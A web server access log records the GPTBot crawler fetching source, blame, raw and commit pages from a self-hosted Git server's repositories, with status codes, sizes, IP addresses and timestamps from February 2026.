"/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21745] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17258] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:16:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:16:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11222] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12340] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11252] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15291] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11057] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" +[17/Feb/2026:16:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 21362] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:16:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 22167] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:16:27:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/status.json" +[17/Feb/2026:16:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/status.json" +[17/Feb/2026:16:27:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:27:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:16:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/status.json" +[17/Feb/2026:16:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11205] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15354] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13522] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11205] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12789] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13522] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15356] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:16:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=closed" +[17/Feb/2026:16:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16093] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16095] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 